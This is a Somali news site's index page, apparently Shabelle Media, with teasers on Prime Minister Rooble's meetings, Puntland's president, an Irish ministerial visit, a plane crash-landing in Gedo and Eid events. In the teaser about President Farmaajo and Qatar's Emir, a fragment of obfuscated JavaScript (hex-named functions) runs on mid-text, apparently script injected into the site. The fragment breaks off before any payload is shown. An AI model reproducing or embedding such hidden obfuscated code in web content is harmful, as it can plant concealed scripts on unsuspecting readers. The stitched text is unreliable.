Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Ra’iisul wasaare Rooble oo la kulmay Mahdi Guuleed iyo Cabdi Xaashi

Ra’isul Wasaaraha XFS  Mudane Maxamed Xuseen Rooble ayaa kulan ku qabsoomay jawi wanaagsan oo ku saabsan arrimaha doorashada kuraasta Gobollada Woqooyi xafiiskiisa kula yeeshay Guddoomiyaha Aqalka Sare  ee BFS Mudane Cabdi Xaashi Cabdullaahi  iyo Ra’isul Wasaare ku-xigeenka dalka Mahdi Maxamed Guuleed Wadatashi iyo gorfeyn ka dib waxaa la isla gartay in Guddoomiye Cabdi Cabdi Xaashi iyo Ra’iisul Wasaare  ku-xigeenku muddo...

Madaxweyne Sicii Deni oo dib ugu laabtay magaalada Garoowe

Madaxweynaha Puntland, Siciid Cabdullaahi Deni oo ka soo kicitimay magaalada Nairobi ee xarunta waddanka Kenya, ayaa maanta oo Khamiis ah lagu soo dhoweeyay caasimadda Garoowe. Madaxweyne Deni, ayaa soo dhowayn abaabulan loogu sameeyay garoonka diyaaradaha Garoowe, waxaana loo xiray dhammaan waddooyinka waaweyn ee magaalada. Siciid Deni ayaa mudda bil ku dhowaad ah safar la xiriira ololaha doorashada Soomaaliya ugu maqnaa dalalka...

Wasiirka difaaca XF oo Muqdisho kusoo dhoweeyay dhiggiisa Ireland

Wasiirka Wasaaradda Gaashaandhigga XFS Xasan Xuseen Xaaji oo uu Welhiyo Wasiirka arrimaha dibedda XFS Maxamed Cabdirisaaq ayaa waxay Muqdisho kusoo dhaweeyeen Wasiirka Wasaaradda difaaca iyo arrimaha dibedda dalka Ireland Simon Coveney TD iyo xubno kale oo la socday. Wasiirka Wasaaradda Gaashaandhigga XFS Xasan Xuseen Xaaji iyo Wasiirka Gaashaandhigga iyo arrimaha dibedda Ireland ayaa si wadajir ah salaan ugu qaatay cutubyo...

Guddiga dib u heshiisiinta Gedo oo warbixin u gudbiyey Rooble

Guddiga dib u heshiisiinta gobolka Gedo ayaa Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble  u soo gudbiyay Warbixinta howlihii u qabsoomay iyo talo soo jeedintooda la xiriirta xal u helista arrinta Gedo. Afhayeenka Xukuumadda federaalka Soomaaliya Maxamed Ibraahim Macalimuu ayaa sheegay in Ra’iisul Wasaare Rooble uu guddiga uga mahadceliyay dadaalka ay ku bixiyeen waajibaadkii loo igmaday. “Ra’isul Wasaare Maxamed...

Rooble oo faray NISA iyo Booliisku in aysan horjoogsan karin siyaasiyiinta safraya

Ra'iisulwasaaraha Soomaaliya Maxamed Xuseen Rooble ayaa maanta xafiiskiisa ku qaabilay guddiga dib u heshiisiinta gobolka Gedo ee ka socday maamul goboleedyada dalka, wuxuuna ka dhagaystay warbixin ku saabsan wixii usoo qabsoomay muddadii ay joogeen magaalada Garbahaarey ee caasimadda gobolka Gedo. Ra'siisulwasaare Rooble oo kulanka ka hadlay ayaa u mahadceliyay Guddiga oo uu amaanay wixii usoo qabsoomay, isaga oo sheegay in...

Plane crash-lands in Somalia with over 40 passengers onboard

A plane carrying more than 40 passengers crash-landed into a military base in Gedo region, southern Somalia, early Wednesday, local officials confirmed. Officials said the passengers were evacuated safely after a Skyward flight from Nairobi crash-landed at Burahache military camp, Elwak, Gedo region in Somalia, which is about 15 kilometers from the Somalia-Kenya border. "No one was hurt in the incident,"...

Faah faahino kasoo baxaya shil diyaaradeed oo ka dhacay Ceelwaaq

Faah faahino dheeraad ah ayaa waxaa laga helayaa shil diyaaradeed oo saaka aroortii hore ka dhacay garoonka diyaaradaha degmada Ceelwaaq ee gobolka Gedo. Wararka ayaa sheegaya in diyaarad sidday rakaab, isla-markaana ka timid  Nairobi inay ku dhacday garoonkaasi, xilli ay ku sii jeeday degmada Elwak ee ismaamulka Mandera. Ilo wareedyo lagu kalsoon-yahay ayaa Shabelle u sheegay in diyaaraddu ay sidday illaa...

Madaxweyne Farmaajo iyo Amiirka Qatar oo is-weydaarsaday Hambalyada Ciida

Madaxweynaha Jamhuuriyadda Federaaalka Soomaaliya Mudane Maxmaed Cabdullaahi  Farmaajo, oo khadka taleefanka kula hadlay Amiirka Dalka Qatar,  Sheekh Tamiim bin Xamad Al Thani,  ayaa ugu hambalyeyay munaasabadda Ciidda barakeysan ee Ciidul Adxa. Madaxweynaha iyo Amiirka ayaa isweydaarsiga hambalyada kaddib u rajeeyay labada dal iyo dhammaan Muslimiinta  horumar iyo barwaaqo inay ku gaaraan sanadkan kiisa kale. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const...

Puntland oo baaq u dirtay Ganacsatada ku dhaqan Gobolka Mudug

Guddoomiyaha Gobolka Mudug ee Puntland ayaa u sheegay ganacsatada inay qeyb ka noqdaan la dagaallanka Al-Shabaab, isla markaana uga digay inay siiyaan lacago baad ah. Cabdaladhiif Muuse Nuur Guddoomiyaha Gobolka Mudug ee Puntland oo la hadlayay Laanta Afka Soomaaliga ee VOA ayaa hoosta ka xariiqay in xididada ay u siibeen Shabakadii u qaabilsaneyd  Al-Shabaab dilalka qorsheysan ee ka dhaca gudaha...

Xaafadda Daarusalaam ee Muqdisho oo si weyn looga ciiday (SAWIRRO)

Iyadoo maanta geyiga Soomaalida laga ciidayo maalinta 1aad ee Ciidul Adxa ayaa munaasabadeeda laga dareemay xaafadda Daarusalaam ee Magaalada Muqdisho. Boqolaal ka mid ah dadka deegaanka iyo qaar kale oo magaalada isaga kala yimid ayaa Salaadda Ciidda ku oogay barxadda weyn ee  Daarusalaam. Xaafadan oo sanadihii ugu dambeeyay aad u dhismeysay ayaa waxaa ku yaala oo laga hirgeliyay beerta xayawaanaadka iyo...

WARAR KALE

Somalia, WHO Discuss Stronger Health Cooperation at Dubrovnik Forum

DUBROVNIK, Croatia — Somalia's Minister of Foreign Affairs and International Cooperation, Abdisalam Ali (Dhaay), held bilateral talks with the World Health Organization's Regional Director for...

Clan Militia Mobilizes in Beledweyne Over Defense Minister’s Threatening Remarks

BELEDWEYNE, Somalia - Heavily armed fighters from the local Macawisley clan militia loyal to the Xawaadle sub-clan have launched intensive military movements across the strategic...

Guddiga Madaxa-bannaan ee Xuquuqul Insaanka Qaranka Soomaaliyeed oo cambaareeyay dilal ka dhacay Sool iyo...

Muqdisho – Guddiga Madaxa-bannaan ee Xuquuqul Insaanka Qaranka Soomaaliyeed (GMXIQ) ayaa si adag u cambaareeyay falal arxan darro ah oo ka dhacay gobollada Sool...